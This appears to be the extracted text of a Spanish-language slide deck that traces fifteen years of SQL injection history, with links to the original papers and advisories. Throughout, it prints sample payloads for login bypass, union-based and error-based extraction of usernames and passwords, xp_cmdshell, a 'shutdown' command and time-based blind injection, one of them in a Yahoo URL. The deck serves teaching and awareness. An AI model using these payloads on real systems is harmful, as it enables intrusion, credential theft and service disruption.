Feliz 15 aniversario, SQL Injection

Los Amantes del Círculo Polar

25 – Dec – 1998: El nacimiento

http://www.phrack.org/issues.html?id=8&issue=54

‘or ‘1’=‘1

q=“Select uid from users where uid=‘“+$user+”’ and pass=“’+pass+’”;”

admin

‘ or ‘1’=‘1

q=“Select uid from users where uid=‘admin’ and pass=‘’ or ‘1’=‘1’;”

14 – Aug – 2007: IBM

http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability

Inband

-1‘ union select 1,1,1,1,username,1,’a’,1 from users --

2001 - OutBand

http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc

Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.

q=“Select title from noticias where ud=“+$id+”;”

Id=1 or 1=(select top 1 username from sysusers)

Jul – 2007: Microsoft Partner Programme

2002 – Advanced SQL Injection Techniques

https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf

Advanced Tricks

Id= 1; shutdown --

Username: '; begin declare @ret varchar(8000) set @ret=':' select

@ret=@ret+' '+username+'/'+password from users where username>@ret

select @ret as ret into foo end--

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07’

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ': admin/r00tr0x! guest/guest chris/password

fred/sesame' to a column of data type int.

exec master..xp_cmdshell 'dir'

27 – Mar - 2007

Outter Bands

DNS Queries

FTP Sites

SMB Files

Remote DB

Web Files

Log Files

2002 - Blind

http://server/miphp.php?id=1 and 1=1

http://server/miphp.php?id=1 and 1=0

True

False

2010 – US Army

2010 – US Army

2002 – Time Based Blind SQL Injection

http://www.northernfortress.net/more_advanced_sql_injection.pdf

(more) Advanced Tricks

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

ping -n 10 127.0.0.1

2004 – Time-Based in Other Databases

SQL Server1) ; if … wait for delay2) ; exec xp_cmdshell (ping –n)

Oracle1) dms_lock.sleep()

PL/SLQ Injection

MySQL1) and sleep()

5.0 or higher2) Benchmarck functions

Postgres:1) pg:sleep()

Jun – 2007 : Solar Empire Exploit

http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html

Apr – 2013: Yahoo!

http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html

2007 – Time-Based SQL Injection using Heavy Queries

https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf

Time-Based Using Heavy Queries in MS Access

True

False

Deep Blind SQL Injection

http://labs.portcullis.co.uk/application/deep-blind-sql-injection

Serialized SQL Injection

Airthmetic Blind SQL Injection

RFD

Connection String Parameter Pollution

Xpath Injection

LDAP Injection

OWASP TOP 10 - 2013

Forbiden

Fixing Code Injections isn´t the worst job